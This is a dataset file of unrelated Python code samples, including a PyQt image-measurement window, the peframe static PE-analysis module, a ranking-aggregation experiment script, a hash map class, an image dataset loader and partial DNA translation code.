F.log_softmax(out, dim=1)\n\n return out\n","sub_path":"src/models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330290642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 10 09:44:07 2019\nWindow for Measurement\n@author: juliengautier\n\"\"\"\n\n\nimport qdarkstyle \nfrom pyqtgraph.Qt import QtCore,QtGui \nfrom PyQt5.QtWidgets import QApplication,QVBoxLayout,QHBoxLayout,QPushButton\nfrom PyQt5.QtWidgets import QMenu,QWidget,QTableWidget,QTableWidgetItem,QAbstractItemView\nimport sys,time,os\nimport numpy as np\nimport pylab\nfrom PyQt5.QtGui import QIcon\nfrom scipy import ndimage\nfrom visu.WinCut import GRAPHCUT\nimport pathlib\n\n\nclass MEAS(QWidget):\n \n def __init__(self):\n \n super(MEAS, self).__init__()\n p = pathlib.Path(__file__)\n conf=QtCore.QSettings(str(p.parent / 'confVisu.ini'), QtCore.QSettings.IniFormat)\n \n self.icon=str(p.parent) + '/icons/'\n self.isWinOpen=False\n self.setup()\n self.setWindowTitle('MEASUREMENTS')\n self.shoot=0\n self.nomFichier=''\n self.TableSauv=['file,Max,Min,x Max,y max,Sum,Mean,Size,x c.mass,y c.mass']\n self.conf =conf\n self.path=self.conf.value('VISU'+\"/path\")\n self.winCoupeMax=GRAPHCUT()\n self.winCoupeMin=GRAPHCUT()\n self.winCoupeXmax=GRAPHCUT()\n self.winCoupeYmax=GRAPHCUT()\n self.winCoupeSum=GRAPHCUT()\n self.winCoupeMean=GRAPHCUT()\n self.winCoupeXcmass=GRAPHCUT()\n self.winCoupeYcmass=GRAPHCUT()\n self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n self.Maxx=[]\n self.Minn=[]\n self.Summ=[]\n self.Mean=[]\n self.Xmax=[]\n self.Ymax=[]\n self.Xcmass=[]\n self.Ycmass=[]\n self.labelsVert=[]\n self.setWindowIcon(QIcon(self.icon+'LOA.png'))\n \n def setFile(self,file) :\n self.nomFichier=file\n \n def setup(self):\n \n vLayout=QVBoxLayout()\n \n hLayout1=QHBoxLayout()\n \n self.FileMenu=QPushButton('File')\n self.FileMenu2=QPushButton('Plot')\n hLayout1.addWidget(self.FileMenu)\n hLayout1.addWidget(self.FileMenu2)\n menu=QMenu()\n menu.addAction('&Open',self.openF)\n menu.addAction('&Save',self.saveF)\n self.FileMenu.setMenu(menu)\n menu2=QMenu()\n menu2.addAction('max',self.PlotMAX)\n menu2.addAction('min',self.PlotMIN)\n menu2.addAction('x max',self.PlotXMAX)\n menu2.addAction('y max',self.PlotYMAX)\n menu2.addAction('Sum',self.PlotSUM)\n menu2.addAction('Mean',self.PlotMEAN)\n \n menu2.addAction('x center mass',self.PlotXCMASS)\n menu2.addAction('y center mass',self.PlotYCMASS)\n \n self.FileMenu2.setMenu(menu2)\n \n \n \n hLayout2=QHBoxLayout()\n self.table=QTableWidget()\n hLayout2.addWidget(self.table)\n \n self.table.setColumnCount(10)\n #self.table.setRowCount(10)\n \n self.table.setHorizontalHeaderLabels(('File','Max','Min','x max','y max','Sum','Mean','Size','x c.mass','y c.mass'))\n self.table.horizontalHeader().setVisible(True)\n self.table.setAlternatingRowColors(True)\n self.table.resizeColumnsToContents()\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)# no modifiable\n \n vLayout.addLayout(hLayout1)\n vLayout.addLayout(hLayout2)\n self.setLayout(vLayout)\n \n def saveF(self):\n \n fname=QtGui.QFileDialog.getSaveFileName(self,\"Save Measurements as txt file\",self.path)\n \n self.path=os.path.dirname(str(fname[0]))\n #mat=np.array(self.TableSauv)\n #print('mat=',mat)\n# with open('myfile','w',)as f:\n# json.dump(self.TableSauv,f)\n f=open(str(fname[0])+'.txt','w')\n f.write(\"\\n\".join(self.TableSauv))\n f.close()\n \n def openF(self) :\n print ('open not done')\n \n\n def PlotMAX(self):\n self.open_widget(self.winCoupeMax)\n self.winCoupeMax.SetTITLE('Plot Max')\n self.winCoupeMax.PLOT(self.Maxx)\n \n def PlotMIN (self):\n self.open_widget(self.winCoupeMin)\n self.winCoupeMin.SetTITLE('Plot Min')\n self.winCoupeMin.PLOT(self.Minn)\n \n \n def PlotXMAX(self):\n self.open_widget(self.winCoupeXmax)\n self.winCoupeXmax.SetTITLE('Plot X MAX')\n self.winCoupeXmax.PLOT(self.Xmax)\n \n def PlotYMAX(self):\n self.open_widget(self.winCoupeYmax)\n self.winCoupeYmax.SetTITLE('Plot Y MAX')\n self.winCoupeYmax.PLOT(self.Ymax)\n \n \n def PlotSUM(self):\n self.open_widget(self.winCoupeSum)\n self.winCoupeSum.SetTITLE('Plot Sum')\n self.winCoupeSum.PLOT(self.Summ)\n \n def PlotMEAN (self):\n self.open_widget(self.winCoupeMean)\n print('plot mean')\n self.winCoupeMean.SetTITLE('Plot Mean')\n print('pppp')\n self.winCoupeMean.PLOT(self.Mean)\n print('ppeeeepp')\n \n def PlotXCMASS (self):\n self.open_widget(self.winCoupeXcmass)\n self.winCoupeXcmass.SetTITLE('Plot x center of mass')\n self.winCoupeXcmass.PLOT(self.Xcmass)\n \n def PlotYCMASS (self):\n self.open_widget(self.winCoupeYcmass)\n self.winCoupeYcmass.SetTITLE('Plot Y center of mass')\n self.winCoupeYcmass.PLOT(self.Xcmass) \n \n \n def Display(self,data):\n \n maxx=round(data.max(),3)\n minn=round(data.min(),3)\n summ=round(data.sum(),3)\n moy=round(data.mean(),3)\n \n (xmax,ymax)=pylab.unravel_index(data.argmax(),data.shape)\n (xcmass,ycmass)=ndimage.center_of_mass(data)\n xcmass=round(xcmass,3)\n ycmass=round(ycmass,3)\n xs=data.shape[0]\n ys=data.shape[1]\n self.table.setRowCount(self.shoot+1)\n self.table.setItem(self.shoot, 0, QTableWidgetItem(str(self.nomFichier)))\n self.table.setItem(self.shoot, 1, QTableWidgetItem(str(maxx)))\n self.table.setItem(self.shoot, 2, QTableWidgetItem(str(minn)))\n self.table.setItem(self.shoot, 3, QTableWidgetItem(str(xmax)))\n self.table.setItem(self.shoot, 4, QTableWidgetItem(str(ymax)))\n self.table.setItem(self.shoot, 5, QTableWidgetItem(str(summ)))\n self.table.setItem(self.shoot, 6, QTableWidgetItem(str(moy)))\n self.table.setItem(self.shoot, 7, QTableWidgetItem( (str(xs) +'*'+ str(ys) ) ))\n self.table.setItem(self.shoot, 8, QTableWidgetItem( str(xcmass) ) )\n self.table.setItem(self.shoot, 9, QTableWidgetItem( str(ycmass) ) )\n \n self.table.resizeColumnsToContents()\n self.labelsVert.append('%s'% self.shoot)\n self.TableSauv.append( '%s,%.1f,%.1f,%i,%i,%.1f,%.3f,%.2f,%.2f,%.2f,%.2f' % (self.nomFichier,maxx,minn,xmax,ymax,summ,moy,xs,ys,xcmass,ycmass) )\n self.Maxx.append(maxx)\n self.Minn.append(minn)\n self.Summ.append(summ)\n self.Mean.append(moy)\n self.Xmax.append(xmax)\n self.Ymax.append(ymax)\n \n self.Xcmass.append(xcmass)\n self.Ycmass.append(ycmass)\n \n \n self.table.setVerticalHeaderLabels(self.labelsVert)\n\n\n\n # plot Update \n if self.winCoupeMax.isWinOpen==True:\n self.winCoupeMax.PLOT(self.Maxx)\n if self.winCoupeMin.isWinOpen==True:\n self.winCoupeMin.PLOT(self.Minn)\n \n if self.winCoupeXmax.isWinOpen==True:\n self.winCoupeXmax.PLOT(self.Xmax)\n if self.winCoupeYmax.isWinOpen==True:\n self.winCoupeYmax.PLOT(self.Ymax) \n if self.winCoupeSum.isWinOpen==True:\n self.winCoupeSum.PLOT(self.Summ)\n \n if self.winCoupeMean.isWinOpen==True:\n self.winCoupeMean.PLOT(self.Mean)\n \n if self.winCoupeXcmass.isWinOpen==True:\n self.winCoupeXcmass.PLOT(self.Xcmass)\n if self.winCoupeYcmass.isWinOpen==True:\n self.winCoupeYcmass.PLOT(self.Ycmass)\n \n self.shoot+=1\n \n def closeEvent(self, event):\n \"\"\" when closing the window\n \"\"\"\n self.isWinOpen=False\n self.shoot=0\n self.TableSauv=['file,Max,Min,x Max,y max,Sum,Mean,Size,x c.mass,y c.mass']\n \n if self.winCoupeMax.isWinOpen==True:\n self.winCoupeMax.close()\n if self.winCoupeMin.isWinOpen==True:\n self.winCoupeMin.close()\n if self.winCoupeXmax.isWinOpen==True:\n self.winCoupeXmax.close()\n if self.winCoupeYmax.isWinOpen==True:\n self.winCoupeYmax.close()\n if self.winCoupeSum.isWinOpen==True:\n self.winCoupeSum.close()\n if self.winCoupeMean.isWinOpen==True:\n self.winCoupeMean.close() \n if self.winCoupeXcmass.isWinOpen==True:\n self.winCoupeXcmass.close()\n if self.winCoupeYcmass.isWinOpen==True:\n self.winCoupeYcmass.close()\n time.sleep(0.1)\n event.accept() \n\n def open_widget(self,fene):\n \"\"\" ouverture widget suplementaire \n \"\"\"\n\n if fene.isWinOpen==False:\n fene.setup\n fene.isWinOpen=True\n A=self.geometry()\n fene.setGeometry(A.left()+A.width(),A.top(),500,A.height())\n fene.show()\n else:\n fene.activateWindow()\n fene.raise_()\n fene.showNormal()\n \n \n \nif __name__ == \"__main__\":\n appli = QApplication(sys.argv) \n appli.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n e = MEAS() \n e.show()\n appli.exec_() ","sub_path":"visu/winMeas.py","file_name":"winMeas.py","file_ext":"py","file_size_in_byte":9535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366729713","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# by Gianni 'guelfoweb' Amato\n\nimport os\nimport re\nimport sys\nimport json\nimport magic\nimport pefile\nimport hashlib\nimport pandas as pd\nfrom datetime import datetime\n\nportable = False\nfor path in sys.path:\n if os.sep + 'peframe' + os.sep + 'peframe' in path:\n portable = True\nif portable:\n from modules import directories\n from modules import features\n from modules import apialert\n from modules import yara_check\n from modules import meta\n from modules import virustotal\n from modules import sections\n from modules import fileurl\n from modules import macro\n from modules import headers\n from modules import nucleus\nelse:\n from peframe.modules import directories\n from peframe.modules import features\n from peframe.modules import apialert\n from peframe.modules import yara_check\n from peframe.modules import meta\n from peframe.modules import virustotal\n from peframe.modules import sections\n from peframe.modules import fileurl\n from peframe.modules import macro\n from peframe.modules import headers\n from peframe.modules import nucleus\n\n\ndef version():\n return \"6.0.3\"\n\n\ndef get_datetime_now():\n return datetime.now()\n\n\ndef isfile(filename):\n if os.path.isfile(filename):\n return True\n return False\n\n\ndef ispe(filename):\n if re.match(r'^PE[0-9]{2}|^MS-DOS', filetype(filename)):\n return True\n return False\n\n\ndef filetype(filename):\n return magic.from_file(filename)\n\n\ndef filesize(filename):\n return os.path.getsize(filename)\n\n\ndef get_imphash(filename):\n pe = pefile.PE(filename)\n return pe.get_imphash()\n\n\ndef gethash(filename):\n hashinfo = {}\n\n fh = open(filename, 'rb')\n m = hashlib.md5()\n s = hashlib.sha1()\n s256 = hashlib.sha256()\n\n while True:\n data = fh.read(8192)\n if not data:\n break\n\n m.update(data)\n s.update(data)\n s256.update(data)\n\n hashinfo.update({\"md5\": m.hexdigest(), \"sha1\": s.hexdigest(), \"sha256\": s256.hexdigest()})\n\n return hashinfo\n\n\ndef path_to_file(filename, folder):\n _ROOT = os.path.abspath(os.path.dirname(__file__))\n return os.path.join(_ROOT, folder, filename)\n\n\ndef load_config(config_file):\n with open(config_file) as conf:\n data = json.load(conf)\n return data\n\n\ndef files_to_edit():\n path = {\n \"api_config\": path_to_file('config-peframe.json', 'config'),\n \"string_match\": path_to_file('stringsmatch.json', 'signatures'),\n \"yara_plugins\": path_to_file('yara_plugins', 'signatures')\n }\n return path\n\n\ndef analyze(filename):\n if not isfile(filename):\n exit(\"File not found\")\n\n dt_start = get_datetime_now()\n\n fileinfo = {\n \"version\": version(),\n \"filename\": filename,\n \"filetype\": filetype(filename),\n \"filesize\": filesize(filename),\n # \"virustotal\": virustotal.get_result(\n # \tload_config(\n # \t\tpath_to_file('config-peframe.json', 'config'))['virustotal'],\n # \tgethash(filename)['md5']),\n }\n\n hashes = gethash(filename)\n fileinfo.update({\n \"md5\": hashes[\"md5\"],\n \"sha1\": hashes[\"sha1\"],\n \"sha256\": hashes[\"sha256\"]\n })\n\n # peinfo = {}\n # docinfo = {}\n #\n # fileinfo.update({\"docinfo\": docinfo})\n # fileinfo.update({\"peinfo\": peinfo})\n\n function_size_list = nucleus.analysis(filename)\n\n if ispe(filename):\n pe = pefile.PE(filename)\n fileinfo.update({\n \"imphash\": pe.get_imphash(),\n \"timestamp\": datetime.utcfromtimestamp(pe.FILE_HEADER.TimeDateStamp).strftime('%Y-%m-%d %H:%M:%S'),\n \"dll\": pe.FILE_HEADER.IMAGE_FILE_DLL,\n \"imagebase\": pe.OPTIONAL_HEADER.ImageBase,\n \"entrypoint\": pe.OPTIONAL_HEADER.AddressOfEntryPoint,\n \"behavior\": yara_check.yara_match_from_file(\n path_to_file('antidebug_antivm.yar', 'signatures/yara_plugins/pe'), filename),\n \"breakpoint\": apialert.get_result(pe, load_config(path_to_file('stringsmatch.json', 'signatures'))[\n 'breakpoint']),\n \"metadata\": meta.get(pe),\n \"function_size\": function_size_list\n })\n\n fileinfo.update(headers.get_dos_header(pe))\n fileinfo.update(headers.get_file_header(pe))\n fileinfo.update(headers.get_optional_header(pe))\n fileinfo.update(features.get_result(pe, filename))\n\n sections_dict = sections.get_result(pe)\n fileinfo.update({\"section_count\": sections_dict[\"count\"], \"section_details\": sections_dict[\"details\"]})\n\n strings_dict = fileurl.get_result(filename, load_config(path_to_file('stringsmatch.json', 'signatures')))\n fileinfo.update({\n \"string_file\": strings_dict[\"file\"],\n \"string_url\": strings_dict[\"url\"],\n \"string_ip\": strings_dict[\"ip\"],\n \"string_fuzzing\": strings_dict[\"fuzzing\"],\n \"string_dump\": strings_dict[\"dump\"],\n \"string_count\": strings_dict[\"string_count\"],\n })\n\n directories_dict = directories.get(pe)\n export_df = pd.DataFrame(directories_dict[\"export\"])\n if not export_df.empty:\n export_df[\"function\"] = export_df[\"function\"].apply(lambda x: x.decode(\"utf-8\") if not isinstance(x,str) else x)\n\n fileinfo.update({\n \"import\": directories_dict[\"import\"],\n \"export\": export_df.to_dict('records'),\n \"debug\": directories_dict[\"debug\"],\n \"tls\": directories_dict[\"tls\"],\n \"resources\": directories_dict[\"resources\"],\n \"relocations\": directories_dict[\"relocations\"],\n \"sign\": directories_dict[\"sign\"]\n })\n\n fileinfo.update({\"yara_plugins\": yara_check.yara_match_from_folder(\n path_to_file('pe', 'signatures/yara_plugins'), filename, ['antidebug_antivm.yar'])})\n else:\n fileinfo.update({\"docinfo\": macro.get_result(filename)})\n fileinfo.update({\"yara_plugins\": yara_check.yara_match_from_folder(\n path_to_file('doc', 'signatures/yara_plugins'), filename)})\n\n dt_end = get_datetime_now()\n\n fileinfo.update({\"time\": str(dt_end - dt_start)})\n del fileinfo[\"e_res\"]\n del fileinfo[\"e_res2\"]\n return fileinfo\n","sub_path":"peframe/peframe.py","file_name":"peframe.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547804659","text":"import sys\nimport time\nimport numpy as np\nimport scipy.stats\n#import plackettluce as pl\nimport stats as stats\nimport mmgbtl as mm\nimport csv\nimport glob\nimport os\n\n\nif __name__ == '__main__':\n maxdatasize = 1000\n mm_iters = 100\n mm_epsilon = None\n trialcnt = 0\n rslt_rt_mm = np.zeros((maxdatasize, 10), float)\n rslt_bt_mm = np.zeros((maxdatasize, 10), float)\n rslt_ot_mm = np.zeros((maxdatasize, 10), float)\n for f in glob.glob(\"*.csv\"):\n trialcnt += 1\n print(\"Trial: \", trialcnt)\n filename = open(f)\n reader = csv.reader(filename)\n next(reader)\n gt = next(reader)\n gamma = [ float(x) for x in gt ]\n m = len(gamma)\n gamma = np.asarray(gamma)\n data = []\n for itr in range(0, maxdatasize):\n data.append([ int(x) for x in next(reader)])\n\n rslt_mse_mm = np.zeros((mm_iters, 10), float)\n\n rslt_mm_full = np.zeros((mm_iters, m * 10), float)\n\n print(\"n = \", end='')\n sys.stdout.flush()\n\n for j in range(0, 10):\n n = (j + 1) * 100\n\n alts = [i for i in range(m)]\n mmagg = mm.MMPLAggregator(alts)\n\n print(\"\\b\"*len(str(j*100)) + str((j+1)*100), end='')\n sys.stdout.flush()\n votes = np.asarray(data[0:n])\n t_mm = time.perf_counter()\n gamma_mmfull, btime, otime = mmagg.aggregate(votes, mm_epsilon, mm_iters)\n t_mm = time.perf_counter() - t_mm\n rslt_mm_full[:, j*100:(j+1)*100 ] = gamma_mmfull\n gamma_mm = gamma_mmfull[-1]\n rslt_rt_mm[trialcnt-1,j] = t_mm\n rslt_bt_mm[trialcnt-1,j] = btime\n rslt_ot_mm[trialcnt-1,j] = otime\n for itr in range(0, mm_iters):\n rslt_mse_mm[itr, j] = stats.mse(gamma, gamma_mmfull[itr])\n\n print()\n outnameMM_mse = \"rslt_mm_mse_\"+str(trialcnt)+\".csv\"\n outnameMMfull = \"rslt_mm_est_\"+str(trialcnt)+\".csv\"\n np.savetxt(outnameMM_mse, rslt_mse_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(outnameMMfull, rslt_mm_full, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_rt.csv\", rslt_rt_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_bt.csv\", rslt_bt_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_ot.csv\", rslt_ot_mm, delimiter=',', newline=\"\\r\\n\")\n #break\n","sub_path":"Zhibing/mm100iter.py","file_name":"mm100iter.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536294811","text":"import zipfile\nfrom unittest import mock\n\nfrom briefcase.platforms.macOS.app import macOSAppCreateCommand\n\n\ndef test_install_app_support_package(first_app_config, tmp_path):\n \"\"\"A support package can be downloaded and unpacked where it is needed.\"\"\"\n # Write a temporary support zip file which includes the Python lib\n support_file = tmp_path / \"out.zip\"\n with zipfile.ZipFile(support_file, \"w\") as support_zip:\n support_zip.writestr(\"internal/file.txt\", data=\"hello world\")\n support_zip.writestr(\"Python/Resources/lib/module.py\", data=\"code\")\n\n # create app paths\n app_path = tmp_path / \"macOS\" / \"app\" / \"First App\" / \"First App.app\"\n lib_path = app_path / \"Contents\" / \"Resources\"\n support_path = lib_path / \"Python\" / \"Support\"\n support_path.mkdir(parents=True)\n\n create_command = macOSAppCreateCommand(base_path=tmp_path)\n\n # Modify download_url to return the temp zipfile\n create_command.download_url = mock.MagicMock(return_value=support_file)\n\n # Mock support package path\n create_command.support_path = mock.MagicMock(return_value=support_path)\n\n # Install the support package\n create_command.install_app_support_package(first_app_config)\n\n # Confirm that only the lib was kept\n assert (support_path / \"Python\" / \"Resources\" / \"lib\").exists()\n assert (support_path / \"Python\" / \"Resources\" / \"lib\" / \"module.py\").exists()\n assert not (support_path / \"internal\").exists()\n","sub_path":"tests/platforms/macOS/app/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474207325","text":"from Double_Linked_Lists import Double_Linked_List\nfrom DataNode import DataNode\n\nLI0NEAR_PROBING = 0\nQUADRATIC_PROBING = 1\nSEPERATE_CHAINING = 2\n\nclass HashMap:\n def __init__(self, length, collisiontype, hashfuntion):\n self.lijst = None\n #If the params are valid, create the main variables\n if self.createHashMap(length, collisiontype):\n self.length = length\n self.collisionType = collisiontype\n self.hashfunction = hashfuntion\n\n def createHashMap(self, length, collisiontype):\n \"\"\"\n Create a new hashmap.\n :param length: The length of the table.\n :param collisiontype: The way to solve a collision.\n :return: True if the creation was succesfull, false otherwise.\n \"\"\"\n #Input validation\n if 0 > collisiontype > 2:\n print(\"Invalid collisiontype!!\")\n return False\n\n if length <= 0:\n print(\"Invalid length!\")\n return False\n\n #Creating map\n self.lijst = []\n for i in range(length):\n self.lijst.append(\"\")\n #If linked lists are used, fill every position with an empty link\n if collisiontype == 2:\n for i in range(length):\n new_link = Double_Linked_List()\n self.lijst[i] = new_link\n return True\n\n def isEmpty(self):\n \"\"\"\n Checks if the list is empty.\n :return: True if list is empty, false otherwise\n \"\"\"\n for item in self.lijst:\n if item != \"\":\n return False\n if self.collisionType == 2:\n if not item.isEmpty():\n return False\n return True\n\n def tableInsert(self, searchKey, data):\n \"\"\"\n Inserts a new element in the table.\n :param searchKey: The new item to insert\n :param data: The data that needs to be stored\n :return: True if the insertion succeeded, false otherwise.\n \"\"\"\n #Calculate adres and make datanode\n adres = self.calculateAdres(searchKey)\n new_node = DataNode(searchKey, data)\n #Check if a collision occurs\n if self.lijst[adres] != \"\":\n return self.solveCollision(adres, new_node, False)\n else:\n if self.collisionType == 2:\n self.lijst[adres].insertBeginning(new_node)\n else:\n self.lijst[adres] = new_node\n return True\n\n def calculateAdres(self, searchKey):\n \"\"\"\n Calculates the adres with the hashfunction.\n :param searchKey: The key to be used in the function\n :return: The adres calculated by the hash function.\n \"\"\"\n adres = 0\n if type(searchKey) is str:\n adres = len(searchKey) % self.length\n elif type(searchKey) is int:\n adres = searchKey % self.length\n return adres\n\n def tableRetrieve(self, searchKey):\n \"\"\"\n Returns an item from the hashmap.\n :param searchKey: The item to search for and return.\n :return: item: The item that was found with the searchkey.\n :return: node: The node linked with the searchKey or None if nothing was found\n \"\"\"\n if self.isEmpty():\n return False\n adres = self.calculateAdres(searchKey)\n if self.collisionType == 2:\n return self.solveCollision(adres, searchKey, True)\n position = self.solveCollision(adres, searchKey, True)\n node = self.lijst[position]\n return node\n\n def tableDelete(self, searchKey):\n \"\"\"\n Deletes item from hashmap.\n :param searchKey: Key from the node that needs to be deleted.\n :return: True if the deletion succeeded, false otherwise.\n \"\"\"\n if self.isEmpty():\n return False\n adres = self.calculateAdres(searchKey)\n if self.collisionType == 2:\n deleted = self.seperateChaining(adres, searchKey, True, True)\n if deleted:\n return deleted\n else:\n return True\n else:\n position = self.solveCollision(adres, searchKey, True)\n if not position:\n return position\n else:\n self.lijst[position] = \"\"\n return True\n\n def solveCollision(self, adres, data, search):\n \"\"\"\n Solves a collision by chosing from one of the methods.\n :param adres: Adres that caused collision\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: success, adres: Indicates wether the collision was solved. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n if self.collisionType == 0:\n return self.linearProbing(adres, data, search)\n elif self.collisionType == 1:\n return self.quadraticProbing(adres, data, search)\n elif self.collisionType == 2:\n return self.seperateChaining(adres, data, search, False)\n\n def linearProbing(self, adres, data, search):\n \"\"\"\n Solve a collision with linear probing.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: Indicates wether the collision was solved. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n current_adres = adres\n count = 0\n while True:\n #Search through the list for the searchkey\n if search:\n if self.lijst[current_adres] != \"\":\n if self.lijst[current_adres].searchKey == data:\n return current_adres\n #Insert element\n else:\n if self.lijst[current_adres] == \"\":\n self.lijst[current_adres] = data\n return True\n\n current_adres += 1\n count += 1\n\n if count == self.length:\n return False\n\n #Make sure to keep looping over the list\n if current_adres == self.length:\n current_adres = 0\n\n def quadraticProbing(self, adres, data, search):\n \"\"\"\n Solve a collision with quadratic probing.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: Indicates wether the collision was solved. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n current_adres = adres\n #We put i on 2 because 1**2 is already visited by current_adres\n i = 1\n #Starts on 1 because we already visited the initial adres\n count = 1\n while True:\n #Search through the list for the searchkey\n if search:\n if self.lijst[current_adres] != \"\":\n if self.lijst[current_adres].searchKey == data:\n return current_adres\n else:\n if self.lijst[current_adres] == \"\":\n self.lijst[current_adres] = data\n return True\n\n current_adres = (adres + i**2)%self.length\n i += 1\n count += 1\n\n #Check if the whole list was checked\n if count == self.length:\n return False\n\n # if current_adres >= self.length:\n # current_adres = 0\n\n def seperateChaining(self, adres, data, search, delete):\n \"\"\"\n Solve a collision with seperate chaining.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :param delete: Indicates if the algorithm has to delete or not.\n :return: Indicates wether the collision was solved or the item found. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n if search:\n table = self.lijst[adres]\n length = table.getLength()\n current_link = table.head\n counter = 0\n while counter != length:\n if current_link.item.searchKey == data:\n if delete:\n table.delete(counter)\n else:\n return current_link.item\n else:\n current_link = current_link.next\n counter += 1\n return False\n else:\n self.lijst[adres].insertBeginning(data)\n return True\n","sub_path":"thomas/HashMap.py","file_name":"HashMap.py","file_ext":"py","file_size_in_byte":8727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513550039","text":"from torch.utils.data import Dataset\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\nimport json\r\nimport time\r\nimport os\r\nimport imageio\r\nimport torch\r\nimport numpy as np\r\n\r\nclass Landmark(Dataset):\r\n def __init__(self, images, labels, transform=None):\r\n assert len(images) == len(labels), \"Number of images != Number of labels\"\r\n self.images = images\r\n self.labels = labels\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.images)\r\n\r\n def __getitem__(self, item):\r\n # im = imageio.imread(self.images[item])\r\n im = Image.open(self.images[item])\r\n lbl = self.labels[item]\r\n tmp = im.getpixel((0, 0))\r\n if isinstance(tmp, int) or len(tmp) != 3:\r\n im = im.convert(\"RGB\")\r\n if self.transform is not None:\r\n im = self.transform(im)\r\n\r\n return im, lbl\r\n\r\n def get_name(self, item):\r\n return self.images[item].split('/')[-1]\r\n\r\n\r\ndef load_compressed_data(root_dir, json_file=None, data_name='data.npz', create=False):\r\n data_path = os.path.join(root_dir, data_name)\r\n if os.path.isfile(data_path) and create == False:\r\n print('Load data from compressed file: ', data_path)\r\n data = np.load(data_path)\r\n images = data['images']\r\n labels = data['labels']\r\n cnt = data['cnt']\r\n return images, labels, cnt\r\n\r\n if create == True and os.path.exists(data_path):\r\n os.remove(data_path)\r\n\r\n f = open(os.path.join(root_dir, json_file), 'r')\r\n data_ann = json.loads(json.load(f))\r\n images, labels, cnt = [], [], 0\r\n\r\n print(\"Found %d images in json file\" %(len(data_ann)))\r\n print('Checking image...')\r\n time_start = time.time()\r\n for i in tqdm(range(len(data_ann))):\r\n try:\r\n im_path = os.path.join(root_dir,\r\n 'TrainVal',\r\n str(data_ann[i]['category']),\r\n str(data_ann[i]['id']) + \".jpg\")\r\n im = imageio.imread(im_path)\r\n images.append(im_path)\r\n labels.append(int(data_ann[i]['category']))\r\n cnt += 1\r\n except:\r\n pass\r\n print('Check done in {} s'.format(time.time() - time_start))\r\n\r\n print('Writing data to binary file...')\r\n time_start = time.time()\r\n np.savez_compressed(data_path, images=images, labels=labels, cnt=cnt)\r\n print('Write to {} in {} s'.format(data_path, time.time() - time_start))\r\n\r\n return images, labels, cnt\r\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422753831","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 24 08:32:19 2017\n\n@author: rasmus\n\"\"\"\n\ndef get_reverse_strand(strand):\n reverse_strand = ''\n for i in range(1, len(strand) + 1 ):\n if strand[-i] == 'A':\n reverse_strand = reverse_strand + 'T'\n elif strand[-i] == 'T':\n reverse_strand = reverse_strand + 'A'\n elif strand[-i] == 'C':\n reverse_strand = reverse_strand + 'G' \n elif strand[-i] == 'G':\n reverse_strand = reverse_strand + 'C'\n else:\n reverse_strand = reverse_strand + 'X'\n \n return reverse_strand\n\n#%% \ndef translate_protein(bp_seq, start_frame):\n gene_map = {\"TTT\":\"F\", \"TTC\":\"F\", \"TTA\":\"L\", \"TTG\":\"L\",\n \"TCT\":\"S\", \"TCC\":\"S\", \"TCA\":\"S\", \"TCG\":\"S\",\n \"TAT\":\"Y\", \"TAC\":\"Y\", \"TAA\":\"*\", \"TAG\":\"*\",\n \"TGT\":\"C\", \"TGC\":\"C\", \"TGA\":\"*\", \"TGG\":\"W\",\n \"CTT\":\"L\", \"CTC\":\"L\", \"CTA\":\"L\", \"CTG\":\"L\",\n \"CCT\":\"P\", \"CCC\":\"P\", \"CCA\":\"P\", \"CCG\":\"P\",\n \"CAT\":\"H\", \"CAC\":\"H\", \"CAA\":\"Q\", \"CAG\":\"Q\",\n \"CGT\":\"R\", \"CGC\":\"R\", \"CGA\":\"R\", \"CGG\":\"R\",\n \"ATT\":\"I\", \"ATC\":\"I\", \"ATA\":\"I\", \"ATG\":\"M\",\n \"ACT\":\"T\", \"ACC\":\"T\", \"ACA\":\"T\", \"ACG\":\"T\",\n \"AAT\":\"N\", \"AAC\":\"N\", \"AAA\":\"K\", \"AAG\":\"K\",\n \"AGT\":\"S\", \"AGC\":\"S\", \"AGA\":\"R\", \"AGG\":\"R\",\n \"GTT\":\"V\", \"GTC\":\"V\", \"GTA\":\"V\", \"GTG\":\"V\",\n \"GCT\":\"A\", \"GCC\":\"A\", \"GCA\":\"A\", \"GCG\":\"A\",\n \"GAT\":\"D\", \"GAC\":\"D\", 